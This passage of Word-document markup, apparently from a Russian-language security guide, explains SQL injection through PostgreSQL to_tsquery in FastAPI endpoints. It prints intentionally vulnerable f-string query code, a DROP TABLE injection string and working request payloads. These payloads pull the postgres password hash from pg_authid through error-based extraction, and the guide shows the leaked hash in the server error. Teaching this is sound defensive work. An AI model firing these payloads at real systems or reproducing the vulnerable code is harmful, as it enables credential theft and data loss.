          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">независимо от наличия search_vector / FTS-data в БД</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evaluates до WHERE-фильтрации.</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app/api/v1/articles.py</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">from fastapi import APIRouter, Query, Depends</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">from sqlalchemy import text</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AsyncSession</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">from app.db.session import get_session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 = APIRouter()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@router.get("/articles/advanced-search")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">async def advanced_search_articles(</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    q: str = Query("", min_length=1),</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    lang: str = Query("english"),</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concat user-input в первый аргумент to_tsquery</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # (попытка добавить wildcard prefix для каждого слова)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    expanded = " &amp; ".join(f"{token}:*" for token in q.split())</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title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to_tsquery('{lang}', '{expanded}')</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">          AND status = 'published'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        LIMIT 50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pacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Двойная ошибка:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">lang</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> приходит от пользователя и подставляется через f-string — это уже SQL injection (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">lang = "english'); DROP TABLE ...; --"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — 3.5).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">expanded</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> строится из user-tokens через concat. Если token содержит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operator-chars — это и tsquery-syntax-injection, и SQL-syntax-injection.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Для иллюстрации </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">именно tsquery-error-based</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (без stacked SQL) — упрощённый вариант:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">@router.get("/articles/search-v2")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">async def search_v2(q: str = Query(""), ...):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # Bind для query body, но concat для построения tsquery-string</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # (типичный паттерн «expand wildcards»)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    sanitized = q.replace("'", "")  # naive escape, не помогает для tsquery</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title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to_tsquery('english', '{sanitized}')</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        LIMIT 50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w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Кавычки удалены, SQL-injection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блокирован. Но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всё равно получает user-controlled string внутри SQL-literal — syntax error в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">tsquery-парсинге</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> выйдет в response, и атакующий может через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">`||`-concat внутри SQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> подложить subquery в первый аргумент:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload — две схемы</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Вариант A — direct error-based extraction (когда есть f-string SQL injection через `q`):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">В уязвимом коде выше, если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содержит SQL-syntax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-escape, атакующий может построить:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">GET /articles/search-v2?q=admin')%20OR%201=(SELECT%20CAST((SELECT%20rolpassword%20FROM%20pg_authid%20WHERE%20rolname='postgres')%20AS%20int))--</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">После </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">q.replace("'",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 = "admin) OR 1=(SELECT CAST((SELECT rolpassword FROM pg_authid WHERE rolname=postgres) AS int))--"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Это уже разломанная SQL-инъекция (потерял кавычки), но если защита не делает escape, исходный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 кавычками идёт целиком в SQL → SQL-injection 3.5, не 3.15.4.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Чистый tsquery-error канал требует другой уязвимости — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">concat через `||` в SQL уже на стороне tsquery</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Вариант B — concat через `||` в tsquery-аргумент (требует </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">частичная</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> SQL inj в первый аргумент `to_tsquery`):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Сценарий: код использует bind для основной части, но dynamic prefix для language:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">@router.get("/search")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w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    q: str = Query(""),</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    config: str = Query("english"),  # user-controlled config name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dynamic config через f-string + bind для q</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to_tsquery('{config}', :q)</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await session.execute(query, {"q": q})</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">config</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GET /search?q=hello&amp;config=english'%20%7C%7C%20(SELECT%20rolpassword%20FROM%20pg_authid%20WHERE%20rolname=current_user)%20%7C%7C%20'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">config = "english' || (SELECT rolpassword FROM pg_authid WHERE rolname=current_user) || '"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Сервер видит:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT id FROM articles</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">WHERE search_vector @@ to_tsquery('english' || (SELECT rolpassword FROM pg_authid WHERE rolname=current_user) || '', :q)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">PostgreSQL evaluates concat first: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">'english' || 'SCRAM-SHA-256$4096:...' ||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"englishSCRAM-SHA-256$4096:..."</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невалидное config-name</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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Сервер отвечает:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ERROR: text search configuration "englishSCRAM-SHA-256$4096:abc..." does not exist</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">HTTP-500 с config-name </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">полностью содержащим extracted password</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error-based extraction</w:t>
      </w:r>
      <w:r>
        <w:rPr>
